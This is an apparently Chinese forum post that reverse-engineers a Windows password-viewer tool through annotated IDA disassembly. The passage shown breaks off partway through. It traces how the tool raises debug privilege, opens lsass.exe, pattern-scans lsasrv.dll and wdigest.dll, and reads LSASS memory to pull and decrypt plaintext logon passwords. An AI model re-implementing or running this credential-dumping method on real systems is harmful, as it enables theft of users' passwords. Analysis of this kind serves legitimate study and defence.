32位系统所有账户密码查看器的逆向分析

冰琥珀 · 发表于 2014-3-1 17:15

本帖最后由冰琥珀于 2014-3-13 09:49 编辑

这是在吾爱的处女贴，大家一起交流，共同进步，这是我发帖的主要目的。好了，下面开始步入正题，这是一个win32操作系统的账户密码查看器，是在某个群中有人问它的原理，我就跟对方要了那个小东西来分析下，于是就有了下面的文章。
这是一个控制台程序，用IDA加载后，基本上就能看到全貌，只要稍加分析下即可。下面我们来慢慢分析。用IDA加载后，我们直接来到了main函数，在最开始的部分，有这么写东西，代码如下：

[AppleScript] 纯文本查看 复制代码

1

2

3

4

5

6

7

00401150                 sub     esp, 2C4h
.text:00401156                 push    offset aNWindowsIBByZS ; "欢迎使用windows密码读取器,by : 学生组Ｇ"...
.text:0040115B                 call    sub_40183D      ; 显示字符串
.text:00401160                 add     esp, 4
.text:00401163                 call    sub_4014E0      ; 提升程序特权
.text:00401168                 cmp     eax, 1
.text:0040116B                 jz      short loc_40117A

先看sub_40183D函数，双击进去之后看到如下代码：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

.text:0040183D arg_0           = dword ptr  4
.text:0040183D arg_4           = dword ptr  8
.text:0040183D
.text:0040183D                 push    ebx
.text:0040183E                 push    esi
.text:0040183F                 mov     esi, offset File
.text:00401844                 push    edi
.text:00401845                 push    esi
.text:00401846                 call    __stbuf
.text:0040184B                 mov     edi, eax
.text:0040184D                 lea     eax, [esp+10h+arg_4]
.text:00401851                 push    eax             ; int
.text:00401852                 push    [esp+14h+arg_0] ; int
.text:00401856                 push    esi             ; File
.text:00401857                 call    sub_402274
.text:0040185C                 push    esi
.text:0040185D                 push    edi
.text:0040185E                 mov     ebx, eax
.text:00401860                 call    __ftbuf
.text:00401865                 add     esp, 18h
.text:00401868                 mov     eax, ebx
.text:0040186A                 pop     edi
.text:0040186B                 pop     esi
.text:0040186C                 pop     ebx
.text:0040186D                 retn
.text:0040186D sub_40183D      endp

这个很明显是显示传进来的字符串的，我们就不仔细分析了。下面来看下一个函数sub_4014E0，双击这个函数我们看到如下代码：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

.text:004014E3 8D 44 24 00                             lea     eax, [esp+1Ch+TokenHandle]
.text:004014E7 50                                      push    eax             ; TokenHandle
.text:004014E8 68 FF 01 0F 00                          push    0F01FFh         ; DesiredAccess
.text:004014ED FF 15 28 80 40 00                       call    ds:GetCurrentProcess ; 获取当前进程句柄
.text:004014F3 50                                      push    eax             ; ProcessHandle
.text:004014F4 FF 15 08 80 40 00                       call    ds:OpenProcessToken ; 打开当前进程访问令牌
.text:004014FA 85 C0                                   test    eax, eax
.text:004014FC 75 13                                   jnz     short loc_401511 ; 判断函数是否调用成功,调用成功则跳转
.text:004014FE 68 EC 92 40 00                          push    offset aOpenprocesstok ; "OpenProcessToken fail"
.text:00401503 E8 CE 02 00 00                          call    _puts
.text:00401508 83 C4 04                                add     esp, 4
.text:0040150B 33 C0                                   xor     eax, eax
.text:0040150D 83 C4 1C                                add     esp, 1Ch
.text:00401510 C3                                      retn
.text:00401511                         ; ---------------------------------------------------------------------------
.text:00401511
.text:00401511                         loc_401511:                             ; CODE XREF: sub_4014E0+1Cj
.text:00401511 8D 4C 24 04                             lea     ecx, [esp+1Ch+Luid]
.text:00401515 51                                      push    ecx             ; lpLuid
.text:00401516 68 D8 92 40 00                          push    offset Name     ; "SeDebugPrivilege"
.text:0040151B 6A 00                                   push    0               ; lpSystemName
.text:0040151D FF 15 00 80 40 00                       call    ds:LookupPrivilegeValueA ; 查看系统权限的特权值
.text:00401523 85 C0                                   test    eax, eax        ; 判断函数是否调用成功
.text:00401525 75 13                                   jnz     short loc_40153A ; 调用成功则跳转
.text:00401527 68 BC 92 40 00                          push    offset aLookupprivileg ; "LookupPrivilegeValue fail"
.text:0040152C E8 A5 02 00 00                          call    _puts
.text:00401531 83 C4 04                                add     esp, 4
.text:00401534 33 C0                                   xor     eax, eax
.text:00401536 83 C4 1C                                add     esp, 1Ch
.text:00401539 C3                                      retn
.text:0040153A                         ; ---------------------------------------------------------------------------
.text:0040153A
.text:0040153A                         loc_40153A:                             ; CODE XREF: sub_4014E0+45j
.text:0040153A 8B 54 24 04                             mov     edx, [esp+1Ch+Luid.LowPart]
.text:0040153E 8B 44 24 08                             mov     eax, [esp+1Ch+Luid.HighPart]
.text:00401542 6A 00                                   push    0               ; ReturnLength
.text:00401544 6A 00                                   push    0               ; PreviousState
.text:00401546 8D 4C 24 14                             lea     ecx, [esp+24h+NewState] ; 新特权的地址
.text:0040154A 89 54 24 18                             mov     [esp+24h+NewState.Privileges.Luid.LowPart], edx ; 初始化新特权
.text:0040154E 8B 54 24 08                             mov     edx, [esp+24h+TokenHandle]
.text:00401552 6A 10                                   push    10h             ; BufferLength
.text:00401554 51                                      push    ecx             ; NewState
.text:00401555 6A 00                                   push    0               ; DisableAllPrivileges
.text:00401557 52                                      push    edx             ; TokenHandle
.text:00401558 C7 44 24 24 01 00 00 00                 mov     [esp+34h+NewState.PrivilegeCount], 1 ; 初始化新特权
.text:00401560 89 44 24 2C                             mov     [esp+34h+NewState.Privileges.Luid.HighPart], eax ; 初始化新特权
.text:00401564 C7 44 24 30 02 00 00 00                 mov     [esp+34h+NewState.Privileges.Attributes], 2 ; 初始化新特权
.text:0040156C FF 15 04 80 40 00                       call    ds:AdjustTokenPrivileges ; 修改特权
.text:00401572 85 C0                                   test    eax, eax
.text:00401574 75 13                                   jnz     short loc_401589

这个函数代码看似有点多，但实际上只是调用了几个函数：OpenProcessToken、LookupPrivilegeValueA和AdjustTokenPrivileges，目的就是为了提升权限。在这个函数调用完成之后，有个判断

[AppleScript] 纯文本查看 复制代码

1 2	`.text:00401168` `cmp eax,` `1` `.text:0040116B jz short loc_40117A`

就是检测下权限是否提升成功，返回值为1表示成功，否则是失败，若成功则程序跳到40117a处。在40117a处我们看到如下代码：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

.text:0040117A loc_40117A:                             ; CODE XREF: _main+1Bj
.text:0040117A                 push    ebx
.text:0040117B                 push    edi
.text:0040117C                 push    offset aLsass_exe ; "lsass.exe"
.text:00401181                 call    sub_401000
.text:00401186                 mov     ebx, eax
.text:00401188                 add     esp, 4
.text:0040118B                 test    ebx, ebx
.text:0040118D                 jnz     short loc_4011BB
.text:0040118F                 push    offset aGetprocesshand ; "GetProcessHandleByName fail !"
.text:00401194                 call    _puts
.text:00401199                 push    offset aTryToRunAsAdmi ; "Try To Run As Administrator ..."
.text:0040119E                 call    _puts
.text:004011A3                 push    offset aEchoPressAnyKe ; "echo Press any Key to Continue ... & pa"...
.text:004011A8                 call    sub_401740
.text:004011AD                 add     esp, 0Ch
.text:004011B0                 xor     eax, eax
.text:004011B2                 pop     edi
.text:004011B3                 pop     ebx
.text:004011B4                 add     esp, 2C4h
.text:004011BA                 retn

这段代码有一个关键函数sub_401000，我们可以看到在这个函数调用完成之后，程序对其返回值做了判断，如果返回值为0，则输出几个提示信息，然后退出程序。这个函数只有一个参数——“lsass.exe”字符串(前面的两个push是保存寄存器的值)，我们现在来看看这个程序内部做了些什么工作。我们一点一点来分析，先看看函数开头部分的代码，如下：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

.text:00401000 81 EC 54 03 00 00                       sub     esp, 354h
.text:00401006 53                                      push    ebx
.text:00401007 55                                      push    ebp
.text:00401008 56                                      push    esi
.text:00401009 57                                      push    edi
.text:0040100A 68 6C 90 40 00                          push    offset ProcName ; "NtQueryInformationProcess"
.text:0040100F 68 60 90 40 00                          push    offset ModuleName ; "ntdll.dll"
.text:00401014 FF 15 14 80 40 00                       call    ds:GetModuleHandleA
.text:0040101A 50                                      push    eax             ; hModule
.text:0040101B FF 15 10 80 40 00                       call    ds:GetProcAddress
.text:00401021 8B 1D 1C 80 40 00                       mov     ebx, ds:OpenProcess
.text:00401027 8B 2D 2C 80 40 00                       mov     ebp, ds:WideCharToMultiByte
.text:0040102D 89 44 24 10                             mov     [esp+364h+var_354], eax
.text:00401031 BF 04 00 00 00                          mov     edi, 4

这段代码看着好像有点多，起始就干一件事，就是获取NtQueryInformationProcess函数的地址，以供后面调用，我们这里注意一下，NtQueryInformationProcess这个函数的地址是保存在[esp+364h+var_354]这里面的，然后我们来看接下来的一大段代码：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

.text:00401036 57                                      push    edi             ; dwProcessId
.text:00401037 6A 00                                   push    0               ; bInheritHandle
.text:00401039 68 FF 0F 1F 00                          push    1F0FFFh         ; dwDesiredAccess
.text:0040103E FF D3                                   call    ebx ; OpenProcess ; 打开进程
.text:00401040 8B F0                                   mov     esi, eax
.text:00401042 85 F6                                   test    esi, esi
.text:00401044 74 72                                   jz      short loc_4010B8
.text:00401046 8D 44 24 14                             lea     eax, [esp+364h+var_350]
.text:0040104A 8D 8C 24 1C 01 00 00                    lea     ecx, [esp+364h+var_248]
.text:00401051 50                                      push    eax
.text:00401052 68 48 02 00 00                          push    248h
.text:00401057 51                                      push    ecx
.text:00401058 6A 1B                                   push    1Bh
.text:0040105A 56                                      push    esi                                
.text:0040105B FF 54 24 24                             call    [esp+378h+var_354] ; 调用NtQueryInformationProcess函数
.text:0040105F 85 C0                                   test    eax, eax
.text:00401061 75 4E                                   jnz     short loc_4010B1
.text:00401063 50                                      push    eax             ; lpUsedDefaultChar
.text:00401064 50                                      push    eax             ; lpDefaultChar
.text:00401065 8B 84 24 28 01 00 00                    mov     eax, [esp+36Ch+lpWideCharStr]
.text:0040106C 8D 54 24 20                             lea     edx, [esp+36Ch+MultiByteStr]
.text:00401070 68 04 01 00 00                          push    104h            ; cbMultiByte
.text:00401075 52                                      push    edx             ; lpMultiByteStr
.text:00401076 6A FF                                   push    0FFFFFFFFh      ; cchWideChar
.text:00401078 50                                      push    eax             ; lpWideCharStr
.text:00401079 6A 00                                   push    0               ; dwFlags
.text:0040107B 6A 00                                   push    0               ; CodePage
.text:0040107D FF D5                                   call    ebp ; WideCharToMultiByte ; 将UNICODE转为char
.text:0040107F 85 C0                                   test    eax, eax
.text:00401081 74 2E                                   jz      short loc_4010B1
.text:00401083 8D 44 04 17                             lea     eax, [esp+eax+364h+var_34D]
.text:00401087 8D 4C 24 18                             lea     ecx, [esp+364h+MultiByteStr]
.text:0040108B 3B C1                                   cmp     eax, ecx
.text:0040108D 72 0E                                   jb      short loc_40109D
.text:0040108F
.text:0040108F                         loc_40108F:                             ; CODE XREF: sub_401000+9Bj
.text:0040108F 80 38 5C                                cmp     byte ptr [eax], 5Ch
.text:00401092 74 09                                   jz      short loc_40109D
.text:00401094 48                                      dec     eax
.text:00401095 8D 54 24 18                             lea     edx, [esp+364h+MultiByteStr]
.text:00401099 3B C2                                   cmp     eax, edx
.text:0040109B 73 F2                                   jnb     short loc_40108F
.text:0040109D
.text:0040109D                         loc_40109D:                             ; CODE XREF: sub_401000+8Dj
.text:0040109D                                                                 ; sub_401000+92j
.text:0040109D 40                                      inc     eax
.text:0040109E 50                                      push    eax             ; lpString2
.text:0040109F 8B 84 24 6C 03 00 00                    mov     eax, [esp+368h+lpString1]
.text:004010A6 50                                      push    eax             ; lpString1
.text:004010A7 FF 15 30 80 40 00                       call    ds:lstrcmpiA    ; 将打开的进程名与目标进程名作比较，看目前打开的进程是不是目标进程，
.text:004010AD 85 C0                                   test    eax, eax
.text:004010AF 74 23                                   jz      short loc_4010D4 ; 如果是，则直接将进程句柄作为返回值返回，否则继续查找
.text:004010B1
.text:004010B1                         loc_4010B1:                             ; CODE XREF: sub_401000+61j
.text:004010B1                                                                 ; sub_401000+81j
.text:004010B1 56                                      push    esi             ; hObject
.text:004010B2 FF 15 38 80 40 00                       call    ds:CloseHandle
.text:004010B8
.text:004010B8                         loc_4010B8:                             ; CODE XREF: sub_401000+44j
.text:004010B8 83 C7 04                                add     edi, 4
.text:004010BB 81 FF 10 27 00 00                       cmp     edi, 2710h
.text:004010C1 0F 82 6F FF FF FF                       jb      loc_401036
.text:004010C7 5F                                      pop     edi
.text:004010C8 5E                                      pop     esi
.text:004010C9 5D                                      pop     ebp
.text:004010CA 33 C0                                   xor     eax, eax
.text:004010CC 5B                                      pop     ebx
.text:004010CD 81 C4 54 03 00 00                       add     esp, 354h
.text:004010D3 C3                                      retn
.text:004010D4                         ; ---------------------------------------------------------------------------
.text:004010D4
.text:004010D4                         loc_4010D4:                             ; CODE XREF: sub_401000+AFj
.text:004010D4 8B C6                                   mov     eax, esi
.text:004010D6 5F                                      pop     edi
.text:004010D7 5E                                      pop     esi
.text:004010D8 5D                                      pop     ebp
.text:004010D9 5B                                      pop     ebx
.text:004010DA 81 C4 54 03 00 00                       add     esp, 354h
.text:004010E0 C3                                      retn
.text:004010E0                         sub_401000      endp

代码有点多，但它干的活却很明确，就是在当前系统中查找“lsass.exe”进程，若是找到这个进程，就返回进程句柄，否则返回0.当这个函数返回了之后，程序对返回值进行了判断，若是找到目标进程，那么程序继续执行下去，否则就退出。我们来看程序接下来又干了些啥活。在程序跳转了之后，来到了这里：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

.text:004011BB loc_4011BB:                             ; CODE XREF: _main+3Dj
.text:004011BB                 mov     ecx, 25h
.text:004011C0                 xor     eax, eax
.text:004011C2                 lea     edi, [esp+2CCh+VersionInformation]
.text:004011C6                 rep stosd
.text:004011C8                 lea     eax, [esp+2CCh+VersionInformation]
.text:004011CC                 mov     [esp+2CCh+VersionInformation.dwOSVersionInfoSize], 94h
.text:004011D4                 push    eax             ; lpVersionInformation
.text:004011D5                 call    ds:GetVersionExA ; 获取系统版本信息
.text:004011DB                 mov     ecx, [esp+2CCh+VersionInformation.dwMajorVersion]
.text:004011DF                 mov     eax, [esp+2CCh+VersionInformation.dwMinorVersion]
.text:004011E3                 cmp     ecx, 5
.text:004011E6                 jnz     loc_40135A
.text:004011EC                 cmp     eax, 1
.text:004011EF                 jnz     loc_401340
.text:004011F5                 mov     [esp+2CCh+var_2BC], 24h
.text:004011FD                 mov     [esp+2CCh+var_2C0], 2

这段代码只干一件事，就是获取操作系统的版本信息，将结果保存在VersionInformation变量中，然后就是判断操作系统版本(vista及其之后的版本中VersionInformation.dwMajorVersion值为6， win2000到xp这个值为5)。接下来就要干正事了。先是在lsasrv.dll中查找一个函数地址，这个函数在后面会被用来解密读出来的密码，代码如下：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

.text:00401205                                                                 ; _main+21Fj
.text:00401205 55                                      push    ebp
.text:00401206 56                                      push    esi
.text:00401207 8B 35 34 80 40 00                       mov     esi, ds:LoadLibraryA
.text:0040120D 68 A4 91 40 00                          push    offset aLsasrv_dll ; "lsasrv.dll"
.text:00401212 FF D6                                   call    esi ; LoadLibraryA
.text:00401214 6A 0E                                   push    0Eh             ; 字符数组长度
.text:00401216 8B E8                                   mov     ebp, eax
.text:00401218 68 30 90 40 00                          push    offset aLUlJ    ; 字符数组
.text:0040121D 68 DD DD FF 7F                          push    7FFFDDDDh       ; 地址最大值
.text:00401222 55                                      push    ebp             ; lsasrv.dll的句柄
.text:00401227 E8 74 03 00 00                          call    sub_4015A0

在上面的这段代码中，主要就是调用了sub_4015A0，而这个函数返回的，是一个地址，代码如下：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

mov     eax, [esp+arg_0]
.text:004015A4 53                                      push    ebx
.text:004015A5 55                                      push    ebp
.text:004015A6 8B 6C 24 10                             mov     ebp, [esp+8+arg_4]
.text:004015AA 56                                      push    esi
.text:004015AB 8B 74 24 1C                             mov     esi, [esp+0Ch+arg_C]
.text:004015AF 57                                      push    edi
.text:004015B0 8D 0C 30                                lea     ecx, [eax+esi]
.text:004015B3 3B CD                                   cmp     ecx, ebp        ; 检测传入句柄的地址是否大于最大的地址的值，如果大于，则函数直接结束
.text:004015B5 77 2F                                   ja      short loc_4015E6
.text:004015B7 8B 7C 24 1C                             mov     edi, [esp+10h+arg_8]
.text:004015BB
.text:004015BB                         loc_4015BB:                             ; CODE XREF: sub_4015A0+42j
.text:004015BB 33 C9                                   xor     ecx, ecx
.text:004015BD 85 F6                                   test    esi, esi        ; 检测传入的字符数据的长度是否为0，为0则函数退出
.text:004015BF 76 0F                                   jbe     short loc_4015D0 ; 如果ecx=esi，则说明在lsasrv.dll中找到的目标字符串(因为每找到一个字符，ecx才+1)
.text:004015C1
.text:004015C1                         loc_4015C1:                             ; CODE XREF: sub_4015A0+2Ej
.text:004015C1 8A 10                                   mov     dl, [eax]       ; 在lsasrv.dll中查找所传入的字符数组
.text:004015C3 8A 1C 39                                mov     bl, [ecx+edi]
.text:004015C6 3A D3                                   cmp     dl, bl
.text:004015C8 75 06                                   jnz     short loc_4015D0 ; 如果ecx=esi，则说明在lsasrv.dll中找到的目标字符串(因为每找到一个字符，ecx才+1)
.text:004015CA 40                                      inc     eax
.text:004015CB 41                                      inc     ecx
.text:004015CC 3B CE                                   cmp     ecx, esi
.text:004015CE 72 F1                                   jb      short loc_4015C1 ; 在lsasrv.dll中查找所传入的字符数组
.text:004015D0
.text:004015D0                         loc_4015D0:                             ; CODE XREF: sub_4015A0+1Fj
.text:004015D0                                                                 ; sub_4015A0+28j
.text:004015D0 3B CE                                   cmp     ecx, esi        ; 如果ecx=esi，则说明在lsasrv.dll中找到的目标字符串(因为每找到一个字符，ecx才+1)
.text:004015D2 74 1A                                   jz      short loc_4015EE
.text:004015D4 BA 01 00 00 00                          mov     edx, 1
.text:004015D9 2B D1                                   sub     edx, ecx
.text:004015DB 03 C2                                   add     eax, edx
.text:004015DD 8D 14 30                                lea     edx, [eax+esi]
.text:004015E0 3B D5                                   cmp     edx, ebp        ; 如果未找到目标字符数组，则要判断当前地址是否大于最大地址值，以确保查找的范围在lsasrv.dll中
.text:004015E2 76 D7                                   jbe     short loc_4015BB

在这个函数中，传入的字符数组就相当于一个标志，目的就是要在内存中找到那组数据，当找到了之后就将那组数据所处的内存地址返回。在这个函数的后面，又调用了另一个函数call sub_4010F0，我们双击进入这个函数内部去看看：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

.text:004010F1 56                                      push    esi
.text:004010F2 57                                      push    edi
.text:004010F3 68 98 90 40 00                          push    offset LibFileName ; "wdigest.dll"
.text:004010F8 FF 15 34 80 40 00                       call    ds:LoadLibraryA ; 加载wdigest.dll
.text:004010FE 8B D8                                   mov     ebx, eax
.text:00401100 68 88 90 40 00                          push    offset aSpinstanceinit ; "SpInstanceInit"
.text:00401105 53                                      push    ebx             ; hModule
.text:00401106 FF 15 10 80 40 00                       call    ds:GetProcAddress ; 获取SpInstanceInit函数的地址
.text:0040110C 8B F0                                   mov     esi, eax
.text:0040110E 33 FF                                   xor     edi, edi
.text:00401110 3B DE                                   cmp     ebx, esi
.text:00401112 8B C3                                   mov     eax, ebx
.text:00401114 73 1E                                   jnb     short loc_401134
.text:00401116
.text:00401116                         loc_401116:                             ; CODE XREF: sub_4010F0+42j
.text:00401116 85 C0                                   test    eax, eax
.text:00401118 74 1A                                   jz      short loc_401134
.text:0040111A 8B F8                                   mov     edi, eax
.text:0040111C 6A 08                                   push    8
.text:0040111E 68 58 90 40 00                          push    offset unk_409058
.text:00401123 83 C0 08                                add     eax, 8
.text:00401126 56                                      push    esi
.text:00401127 50                                      push    eax
.text:00401128 E8 73 04 00 00                          call    sub_4015A0      ; 在wdigest.dll中查找地址
.text:0040112D 83 C4 10                                add     esp, 10h
.text:00401130 3B C6                                   cmp     eax, esi
.text:00401132 72 E2                                   jb      short loc_401116
.text:00401134
.text:00401134                         loc_401134:                             ; CODE XREF: sub_4010F0+24j
.text:00401134                                                                 ; sub_4010F0+28j
.text:00401134 8B 7F FC                                mov     edi, [edi-4]
.text:00401137 53                                      push    ebx             ; hLibModule
.text:00401138 FF 15 18 80 40 00                       call    ds:FreeLibrary
.text:0040113E 8B C7                                   mov     eax, edi
.text:00401140 5F                                      pop     edi
.text:00401141 5E                                      pop     esi
.text:00401142 5B                                      pop     ebx
.text:00401143 C3                                      retn

代码挺多的，但是功能很简单，就是在wdigest.dll中查找某个地址，然后将地址返回。接下来就是call sub_401600这个函数的调用，在这个函数的内部，主要就是读取都断内存数据，并将数据保存在进程中，代码如下：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

.text:0040124A 68 98 91 40 00                          push    offset aSecur32_dll ; "Secur32.dll"
.text:0040124F FF D6                                   call    esi ; LoadLibraryA
.text:00401251 8B F0                                   mov     esi, eax
.text:00401253 68 7C 91 40 00                          push    offset aLsaenumeratelo ; "LsaEnumerateLogonSessions"
.text:00401258 56                                      push    esi             ; hModule
.text:00401259 89 74 24 38                             mov     [esp+2DCh+var_2A4], esi
.text:0040125D FF 15 10 80 40 00                       call    ds:GetProcAddress
.text:00401263 68 64 91 40 00                          push    offset aLsagetlogonses ; "LsaGetLogonSessionData"
.text:00401268 56                                      push    esi             ; hModule
.text:00401269 89 44 24 18                             mov     [esp+2DCh+var_2C4], eax
.text:0040126D FF 15 10 80 40 00                       call    ds:GetProcAddress
.text:00401273 68 50 91 40 00                          push    offset aLsafreereturnb ; "LsaFreeReturnBuffer"
.text:00401278 56                                      push    esi             ; hModule
.text:00401279 89 44 24 44                             mov     [esp+2DCh+var_298], eax
.text:0040127D FF 15 10 80 40 00                       call    ds:GetProcAddress
.text:00401283 89 44 24 1C                             mov     [esp+2D4h+var_2B8], eax
.text:00401287 8D 54 24 20                             lea     edx, [esp+2D4h+var_2B4]
.text:0040128B 8D 44 24 24                             lea     eax, [esp+2D4h+var_2B0]
.text:0040128F 52                                      push    edx
.text:00401290 50                                      push    eax
.text:00401291 FF 54 24 18                             call    [esp+2DCh+var_2C4] ; 调用LsaEnumerateLogonSessions
.text:00401295 8B 44 24 24                             mov     eax, [esp+2D0h+var_2AC]
.text:00401299 C7 44 24 10 00 00 00 00                 mov     [esp+2D0h+var_2C0], 0
.text:004012A1 85 C0                                   test    eax, eax
.text:004012A3 0F 86 84 01 00 00                       jbe     loc_40142D

在上面这段代码中，加载了3个重要的函数LsaEnumerateLogonSessions、LsaGetLogonSessionData和LsaFreeReturnBuffer。其中LsaEnumerateLogonSessions用来获取LUID的个数和值，LsaGetLogonSessionData用来获取LUID对应的用户名和密码，LsaFreeReturnBuffer函数则用来释放内存。我们来看代码：

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

.text:004012AF 8B 4C 24 20                             mov     ecx, [esp+2D0h+var_2B0]
.text:004012B3 8B 54 24 10                             mov     edx, [esp+2D0h+var_2C0]
.text:004012B7 8B 44 24 1C                             mov     eax, [esp+2D0h+var_2B4]
.text:004012BB 8D 34 D1                                lea     esi, [ecx+edx*8]
.text:004012BE 8B 4C 24 3C                             mov     ecx, [esp+2D0h+VersionInformation.dwOSVersionInfoSize]
.text:004012C2 56                                      push    esi             ; LUID的地址
.text:004012C3 50                                      push    eax             ; LsaFreeReturnBuffer函数地址
.text:004012C4 51                                      push    ecx             ; LsaGetLogonSessionData函数地址
.text:004012C5 E8 C6 01 00 00                          call    sub_401490      ; 获取用户名和登陆域名并将其输出
.text:004012CA 83 C4 0C                                add     esp, 0Ch
.text:004012CD 8D 54 24 28                             lea     edx, [esp+2D0h+NumberOfBytesRead]
.text:004012D1 8D 84 24 D4 00 00 00                    lea     eax, [esp+2D0h+Buffer]
.text:004012D8 52                                      push    edx             ; lpNumberOfBytesRead
.text:004012D9 68 00 01 00 00                          push    100h            ; nSize
.text:004012DE 50                                      push    eax             ; lpBuffer
.text:004012DF 57                                      push    edi             ; lpBaseAddress
.text:004012E0 53                                      push    ebx             ; hProcess
.text:004012E1 FF D5                                   call    ebp ; ReadProcessMemory
.text:004012E3 8B 84 24 D4 00 00 00                    mov     eax, [esp+2D0h+Buffer]
.text:004012EA 3B C7                                   cmp     eax, edi
.text:004012EC 0F 84 B6 00 00 00                       jz      loc_4013A8

先来看call sub_401490这个函数内部的代码

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

mov     ecx, [esp+arg_8]
.text:00401494 8D 44 24 0C                             lea     eax, [esp+arg_8]
.text:00401498 50                                      push    eax
.text:00401499 51                                      push    ecx
.text:0040149A FF 54 24 0C                             call    [esp+8+arg_0]   ; 调用LsaGetLogonSessionData
.text:0040149E 8B 54 24 0C                             mov     edx, [esp+arg_8]
.text:004014A2 8B 42 10                                mov     eax, [edx+10h]
.text:004014A5 50                                      push    eax
.text:004014A6 68 94 92 40 00                          push    offset aZS      ; "用户名: %S\n"
.text:004014AB E8 8D 03 00 00                          call    sub_40183D      ; 输出用户名
.text:004014B0 8B 4C 24 14                             mov     ecx, [esp+8+arg_8]
.text:004014B4 83 C4 08                                add     esp, 8
.text:004014B7 8B 51 18                                mov     edx, [ecx+18h]
.text:004014BA 52                                      push    edx
.text:004014BB 68 84 92 40 00                          push    offset aS       ; "登陆域名: %S\n"
.text:004014C0 E8 78 03 00 00                          call    sub_40183D      ; 输出登录域名
.text:004014C5 8B 44 24 14                             mov     eax, [esp+8+arg_8]
.text:004014C9 83 C4 08                                add     esp, 8
.text:004014CC 50                                      push    eax
.text:004014CD FF 54 24 0C                             call    [esp+4+arg_4]   ; 调用LsaFreeReturnBuffer来释放内存
.text:004014D1 C3                                      retn

这个函数内部就是读取数据，然后将用户名和登陆域名输出，这个做完了之后，程序会去读下一段内存数据，从中寻找指定的LUID，如果找到，则在从内存中读取指定LUID对应的密码，然后将其解密，再将解密后的密码输出。代码如下：

[AppleScript] 纯文本查看 复制代码

001

002

003

004

005

006

007

008

009

010

011

012

013

014

015

016

017

018

019

020

021

022

023

024

025

026

027

028

029

030

031

032

033

034

035

036

037

038

039

040

041

042

043

044

045

046

047

048

049

050

051

052

053

054

055

056

057

058

059

060

061

062

063

064

065

066

067

068

069

070

071

072

073

074

075

076

077

078

079

080

081

082

083

084

085

086

087

088

089

090

091

092

093

094

095

096

097

098

099

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

lea     edx, [esp+2D0h+NumberOfBytesRead]
.text:004012D1 8D 84 24 D4 00 00 00                    lea     eax, [esp+2D0h+Buffer]
.text:004012D8 52                                      push    edx             ; lpNumberOfBytesRead
.text:004012D9 68 00 01 00 00                          push    100h            ; nSize
.text:004012DE 50                                      push    eax             ; lpBuffer
.text:004012DF 57                                      push    edi             ; lpBaseAddress
.text:004012E0 53                                      push    ebx             ; hProcess
.text:004012E1 FF D5                                   call    ebp ; ReadProcessMemory ; 读取内存数据
.text:004012E3 8B 84 24 D4 00 00 00                    mov     eax, [esp+2D0h+Buffer]
.text:004012EA 3B C7                                   cmp     eax, edi
.text:004012EC 0F 84 B6 00 00 00                       jz      loc_4013A8
.text:004012F2
.text:004012F2                         loc_4012F2:                             ; CODE XREF: _main+1DCj
.text:004012F2 8D 4C 24 28                             lea     ecx, [esp+2D0h+NumberOfBytesRead]
.text:004012F6 8D 94 24 D4 00 00 00                    lea     edx, [esp+2D0h+Buffer]
.text:004012FD 51                                      push    ecx             ; lpNumberOfBytesRead
.text:004012FE 68 00 01 00 00                          push    100h            ; nSize
.text:00401303 52                                      push    edx             ; lpBuffer
.text:00401304 50                                      push    eax             ; lpBaseAddress
.text:00401305 53                                      push    ebx             ; hProcess
.text:00401306 FF D5                                   call    ebp ; ReadProcessMemory ; 读取内存数据
.text:00401308 8B 84 24 E4 00 00 00                    mov     eax, [esp+2D0h+nSize]
.text:0040130F 8B 0E                                   mov     ecx, [esi]
.text:00401311 3B C1                                   cmp     eax, ecx        ; 检测读取到的LUID值是否是指定的LUID值，如果不是，则比较地址，如果当前地址小于目标地址，则继续读取内存，查找LUID
.text:00401313 75 0E                                   jnz     short loc_401323
.text:00401315 8B 8C 24 E8 00 00 00                    mov     ecx, [esp+2D0h+lpBaseAddress]
.text:0040131C 8B 46 04                                mov     eax, [esi+4]
.text:0040131F 3B C8                                   cmp     ecx, eax
.text:00401321 74 7C                                   jz      short loc_40139F
.text:00401323
.text:00401323                         loc_401323:                             ; CODE XREF: _main+1C3j
.text:00401323 8B 84 24 D4 00 00 00                    mov     eax, [esp+2D0h+Buffer]
.text:0040132A 3B C7                                   cmp     eax, edi
.text:0040132C 75 C4                                   jnz     short loc_4012F2
.text:0040132E 68 34 91 40 00                          push    offset aSpecificLuidNo ; "Specific LUID NOT found\n"
.text:00401333 E8 9E 04 00 00                          call    _puts
.text:00401338 83 C4 04                                add     esp, 4
.text:0040133B E9 D0 00 00 00                          jmp     loc_401410
